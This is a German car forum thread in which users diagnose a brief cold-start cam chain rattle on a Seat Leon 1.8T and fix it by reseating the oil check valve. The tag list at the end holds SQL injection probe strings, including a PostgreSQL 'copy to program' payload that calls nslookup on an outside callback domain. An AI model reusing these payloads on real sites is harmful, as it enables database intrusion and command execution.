Nockenwellenversteller rasselt bei Kaltstart kurz ....

Diskutiere Nockenwellenversteller rasselt bei Kaltstart kurz .... im 1M - Allgemein Forum im Bereich Der Leon 1; Hallo, habe mit meinem Leon 1m 1,8T20V AUQ das Problem das wenn er Kalt ist und 1-2 Tage gestanden ist das beim firstStarten kurz die Kette vom...
Schrotti1977

Schrotti1977

Beiträge
64
Reaktionen
7
Hallo,
habe mit meinem Leon 1m 1,8T20V AUQ das Problem das wenn er Kalt ist und 1-2 Tage gestanden ist das beim
Starten kurz die Kette vom Nockenwellenversteller rasselt.

Ölpumpe Original VAG 1 Jahr alt ; Nockenwellenversteller ca. 1500 Km alt ... Ölsieb Sauber ...Öl Neu und Motul V300 5W40 .

Habe in anderen Foren gelesen das es irgenwo am Ölfilterhalter ein Rückschlagventil geben soll das verhindert das dass Öl zurückläuft.

Finde aber nicht wirklich eine Teilenummer oder Bilder wo das sein soll.

Vllt weis hier jemand etwas.

Mfg Schrotti
 
13.01.2020
#1

Anzeige

Gast

Schau mal hier: Nockenwellenversteller rasselt bei Kaltstart kurz .... . Dort wird jeder fündig!
fastaeddie

fastaeddie

Beiträge
269
Reaktionen
3
Wenn ich es richtig im Kopf habe sitzt das im Halter, also Ölfilterhalter abschrauben und dann sieht man es eigentlich.

Hier ist es die Pos. 6, Bild ist aber vom TDI:

1578995526484.png


Das R-Ventil ist eingeschraubt und löst sich ganz gerne mal.
Teilenummer sollte die 077 103 175 B sein.
1578995923327.png
Hier ist das Ventil die Pos. 15, Bild vom AEB.

Wenn Du die Teilenummer googelst findest Du vieles darüber ;-)
 
  • Gefällt mir
Reaktionen: Schrotti1977
Schrotti1977

Schrotti1977

Beiträge
64
Reaktionen
7
Hallo, danke habe heute gleich mal beim Freundlichen danach schauen lassen . Abgebildet ist es beim AUQ auch aber ohne Teilenummer ... :-/

Heist ich müsste den ganzen Flansch kaufen und ob das Teil dann mit montiert ist konnte er mir auch nicht sagen. Der ganze Halter kostet aber um die 170 € ...

Weist du ob es 077 103 175 B beim AUQ auch ist ? Wenn der Lagermitarbeiter die Nummer eingegeben hat zeigt er ein R-Ventil vom 2,3 und 2,8 Liter an das von oben im Motorblock sitzt.
 
fastaeddie

fastaeddie

Beiträge
269
Reaktionen
3
Ja, bei VW bekommst für die ganzen 1.8T etc etc nur den kompletten Halter mit Ventil, gab da mal ne Änderung und der neue Halter ist wohl größer. Wenn Du den ganzen Flansch kaufst ist das Ventil mit dabei.

Das 077 103 175 B findest Du in sämtlichen Motoren von VW/AUDI/SEAT/SKODA. Mal sitzt das im Olfilterflansch und mal im Motorblock.- Im Motorblock wohl nur bei den "großen" Motoren.

Ich habe das Ventil damals an meinem 1.8T AGU erneuert und das 077 103 175 B beim :) gekauft.

Ich denke das der AUQ auch das Ventil hat, warum sollte VW da extra ein anderes einbauen ?

Nimm doch erst mal den Flansch bei deinem ab und schau mal nach. Meistens ist das Ventil ja nur locker.
Ich habe meins damals mit ein wenig Loctite eingesetzt und etwas fester angezogen.
 
  • Gefällt mir
Reaktionen: Schrotti1977
Schrotti1977

Schrotti1977

Beiträge
64
Reaktionen
7
Danke, habe mir jetzt die Dichtung und das Öl Rückschlagventil geholt. Werde am Samstag dann mal schauen was mir entgegen kommt :D

Berichte dann ob es Erfolg brachte.

Dir auf jedenfall schon mal Vielen Dank
 
  • Gefällt mir
Reaktionen: fastaeddie
Schrotti1977

Schrotti1977

Beiträge
64
Reaktionen
7
So hatte heute meinen Löwen mal zerlegt.

Erstmal zum Ölrückschlagventil 077103175B - das passt am AUQ leider nicht.

Im AUQ ist das keins zum Schrauben sondern eingepresst bzw. rein geschoben.

Das Ventil hat eine Länge von 21 mm und sitzt in einer Bohrung mit Absatz der 21,6 mm Tief ist.

Beim zerlegen war aber meins bündig mit der Dichtfläche - also 0,6 mm rausgewandert.

Konnte das Ölrückschlagventil mit einer Spitzzange relativ einfach raus holen - habe mit einem Körner die Bohrung am Oberen Rand bischen bearbeitet , sodass das Ventil wieder klemmt. Funktion vom Ventil war noch einwandfrei.

Habe alles zerlegt gehabt : Ölfilterhalter , Ölkühler , Raid Adapter, Ölfilter ....alles gereinigt

Den Öldruckschalter für meine Zusatzanzeige habe ich Vorsichtshalber erneuert.

Erste Fahrten heute waren positiv , auch beim warmen Motor imme noch 1,2 Bar Öldruck im Stand.

Jetzt mal schauen wie es Montag früh - nach langer standfase aussieht- ob das kurze Kettenrasseln auch weg ist.

Ob es an den 0,6 mm wo das Ölrückschlagventil zurück gedrückt war lag oder nur der Öldruckgeber von meiner Zusatzanzeige einen weg hatte wird sich somit am Montag zeigen.

Was auf jedenfall somit klar ist - sollte bei jemandem das Öl Rückschlagventil wirklich defekt sein am AUQ - muß wohl der komplette Ölfilterflansch für stolze 150 € gekauft werden ...

Werde wieder berichten.
 

Anhänge

  • Gefällt mir
Reaktionen: FL224 und fastaeddie
fastaeddie

fastaeddie

Beiträge
269
Reaktionen
3
Schön zu lesen das alles geklappt hat, naja fast alles.

Das das Ventil nicht gepasst hat ist natürlich nicht so schön, denke das Du bereits den "neuen" Ölfilterhalter verbaut hattest.
Jetzt weiß ich das das Ventil bei dem neuen Halter nicht geschraubt sondern gepresst ist, man lernt nie aus. War immer der Meinung das nur die Kanäle in dem Halter größer sind. Bei deinem Halter sind die Kanäle definitiv größer wie bei meinem damals.

Interessant finde ich das auch dieses Ventil wandert und sich löst, da frage ich mich was das dann bringt mit dem neuen Halter außer größerer Kanäle.
Noch interessanter ist allerdings das es so aussieht als wäre das Ventil im Durchmesser größer wie die Bohrung im Block und kann somit nicht mehr in den Block gedrückt werden und verschwinden.

Ob es an den 0,6 mm wo das Ölrückschlagventil zurück gedrückt war lag oder nur der Öldruckgeber von meiner Zusatzanzeige einen weg hatte wird sich somit am Montag zeigen.
Ich denke schon das es daran lag das das Ventil 0.6mm rausgedrückt war, dadurch liegt der Dichtring nicht mehr ordentlich an und der Druck geht an dem Ventil vorbei.

Was auf jedenfall somit klar ist - sollte bei jemandem das Öl Rückschlagventil wirklich defekt sein am AUQ - muß wohl der komplette Ölfilterflansch für stolze 150 € gekauft werden ...
Zumindest wenn bereits der große Halter verbaut ist.

Ja, interessiert mich brennend ob es das jetzt war bei Dir. Ich drück die Daumen :)
 
Schrotti1977

Schrotti1977

Beiträge
64
Reaktionen
7
Guten morgen ,

endlich mal wieder Zeit zum schreiben.

Also das Klappern ist bei mir komplett vom Tisch - auch wenn er Kalt ist beim Starten schön ruhig.

Was ich oben vergessen hatte zu schreiben - als ich alles zerlegt habe , habe ich alle Teile gründlich gereinigt. Auffällig war hier halt noch wieviel Dreck aus dem Ölkühler kam. Denke den zu reinigen oder mal zu ersetzen schadet auf jedenfall auch nicht.

Gruß Schrotti1977
 
Thema:

Nockenwellenversteller rasselt bei Kaltstart kurz ....

Nockenwellenversteller rasselt bei Kaltstart kurz .... - Ähnliche Themen

  • Rasseln vom Nockenwellenversteller???

    Rasseln vom Nockenwellenversteller???: Hi leute ich hab doch dieses Rassel kann das vom Nockenwellenversteller bzw dessen kettenspanner kommen??? Bitte um HILFE!!!!!!!!!!
  • was rasselt denn da??

    was rasselt denn da??: 8o Hallo Leute, bin zufällig auf die Seite gestoßen, wußte gar nicht, dass das teil so beliebt ist! Nu aber zu meiner Frage: Gut ich fahr nach...
  • was rasselt denn da?? - Ähnliche Themen

  • Rasseln vom Nockenwellenversteller???

    Rasseln vom Nockenwellenversteller???: Hi leute ich hab doch dieses Rassel kann das vom Nockenwellenversteller bzw dessen kettenspanner kommen??? Bitte um HILFE!!!!!!!!!!
  • was rasselt denn da??

    was rasselt denn da??: 8o Hallo Leute, bin zufällig auf die Seite gestoßen, wußte gar nicht, dass das teil so beliebt ist! Nu aber zu meiner Frage: Gut ich fahr nach...
  • Schlagworte

    testing

    ,

    testing' AND 2*3*8=6*8 AND 'vipm'='vipm

    ,

    testing" AND 2*3*8=6*8 AND "ICn1"="ICn1

    ,
    testing%' AND 2*3*8=6*8 AND 'DT6d'!='DT6d%
    , testing';copy (select '') to program 'nslookup dns.sqli.\013405.1898-27540.1898.e4459.\1.bxss.me